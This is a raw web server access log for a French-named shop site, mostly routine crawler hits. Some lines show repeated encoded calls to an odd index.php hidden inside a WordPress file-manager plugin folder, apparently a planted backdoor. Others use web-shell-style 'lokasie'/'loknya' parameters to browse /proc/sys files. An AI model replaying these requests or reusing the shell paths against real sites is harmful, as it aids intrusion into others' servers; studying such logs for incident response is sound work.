82.165.90.0 - - [18/Aug/2026:00:03:42 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030373832322p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343232322q3162366131356162623964666564353565643464623739316536633134366563222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:04:04 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030373834342p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343234342q6261323535626436396235353539353862613061386332373131373931653037222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:04:25 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030373836352p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343236352q6562376131376530313739626266346536363633393065623731626137616130222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:04:47 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030373838372p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343238372q3330323930313631356333666639303334393634303633396466326361316565222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:05:10 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030373931302p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343331302q6439666335663330653133393830633535303635336634356339623864383930222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:05:32 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030373933322p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343333322q6634333330313130353835306163616438666266326137383036613737663537222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
52.167.144.0 - - [18/Aug/2026:00:06:01 +0200] "GET /api/categoryinfo/?mcode=022_022004&_=1787004358619 HTTP/1.1" 200 821539 cultureloisirs.club "https://cultureloisirs.club/?shop/items/P7141140246/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" "-"
52.167.144.0 - - [18/Aug/2026:00:06:03 +0200] "GET /kaunet/categoryshop/office/sitemap/KWf_CMmGetMemAttrAjaxAction.jsp?IS_LOGIN=false&_=1787004358618 HTTP/1.1" 200 817458 cultureloisirs.club "https://cultureloisirs.club/?shop/items/P7141140246/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" "-"
74.7.243.0 - - [18/Aug/2026:00:06:22 +0200] "GET /?lokasie=/proc/sys/net/ipv6//idgen_retries&loknya=/proc/sys/net/ipv6/ HTTP/1.1" 200 4087 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv6/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:06:25 +0200] "GET /?h=59819354373158 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:06:26 +0200] "GET /?shop/items/U61302195774/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
66.249.66.0 - - [18/Aug/2026:00:06:27 +0200] "GET /?shop/items/M26922131330/ HTTP/1.1" 200 825551 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.66.0 - - [18/Aug/2026:00:06:30 +0200] "GET /?h=03339412535772 HTTP/1.1" 200 801054 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
74.7.243.0 - - [18/Aug/2026:00:06:53 +0200] "GET /?lokasie=/proc/sys/net/ipv4//tcp_probe_interval&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 200 4094 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:06:57 +0200] "GET /?shop/items/U61302159519/ HTTP/1.1" 200 51727 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:07:21 +0200] "GET /?lokasie=/proc/sys/net/ipv6//ip6frag_time&loknya=/proc/sys/net/ipv6/ HTTP/1.1" 200 4087 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv6/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:07:34 +0200] "GET /?h=7723259709476 HTTP/1.1" 200 51699 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:07:39 +0200] "GET /?shop/items/H56011245854/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:07:45 +0200] "GET /?shop/items/K3604613159/ HTTP/1.1" 200 51727 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:07:47 +0200] "GET /?lokasie=/proc/sys/net/ipv6//anycast_src_echo_reply&loknya=/proc/sys/net/ipv6/ HTTP/1.1" 200 4096 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv6/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:07:49 +0200] "GET /?shop/items/F7394946040/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:07:54 +0200] "GET /?shop/items/H5601117014/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
66.249.66.0 - - [18/Aug/2026:00:07:55 +0200] "GET /?h=3703994888440 HTTP/1.1" 200 833693 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.66.0 - - [18/Aug/2026:00:07:55 +0200] "GET /?h=55150343944611 HTTP/1.1" 200 797852 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:00 +0200] "GET /?h=74151772732574 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:04 +0200] "GET /?h=59437874196631 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:08 +0200] "GET /?shop/items/F7394917100/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:08:09 +0200] "GET /?lokasie=/proc/sys/net/ipv4//icmp_ratemask&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 200 4090 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:13 +0200] "GET /?h=3583367788773 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:17 +0200] "GET /?shop/items/M2692210191/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:21 +0200] "GET /?shop/items/M26922177978/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
38.107.232.0 - - [18/Aug/2026:00:08:22 +0200] "GET / HTTP/1.1" 200 51694 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:23 +0200] "GET /?h=34931442243279 HTTP/1.1" 200 51699 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:28 +0200] "GET /?shop/items/F73949247107/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:08:29 +0200] "GET /?lokasie=/proc/sys/net/ipv4//ip_nonlocal_bind&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 200 4090 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:31 +0200] "GET /?shop/items/P71411171399/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:35 +0200] "GET /?h=5728355380001 HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:40 +0200] "GET /?shop/items/P322551754/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:40 +0200] "GET /?shop/items/K4085668024/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:45 +0200] "GET /?h=37778201267425 HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:45 +0200] "GET /?h=2388738846751 HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:08:47 +0200] "GET /?lokasie=/proc/sys/net/ipv4//ping_group_range&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 200 4092 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
38.107.232.0 - - [18/Aug/2026:00:08:48 +0200] "GET /wp-admin/ HTTP/1.1" 200 159244 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:51 +0200] "GET /?shop/items/P7141154224/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:53 +0200] "GET /?shop/items/K40856117095/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:08:54 +0200] "GET /?h=90861344161978 HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:09:01 +0200] "GET /?h=64529222872845 HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
82.165.90.0 - - [18/Aug/2026:00:05:53 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030373935332p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343335332q3962346563383562313235366537636431333435303138376331316463333664222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:06:14 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030373937342p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343337342q6135663166626238316565396632643866663030333033346130313932623030222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:06:36 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030373939362p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343339362q6163656139353837646231383133326539306539663262306666396437336230222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:06:58 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383031382p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343431382q6166633830663432343262353462393264333532303966663666616137613966222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:07:20 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383034302p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343434302q3837333638383265633366303938363562666136333264326430393837306132222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:07:43 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383036332p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343436332q6235343037636231316165663964343736346464373837303736363037613631222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:08:06 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383038362p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343438362q3265393831646232363731353434366132613661616566616630323738396134222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
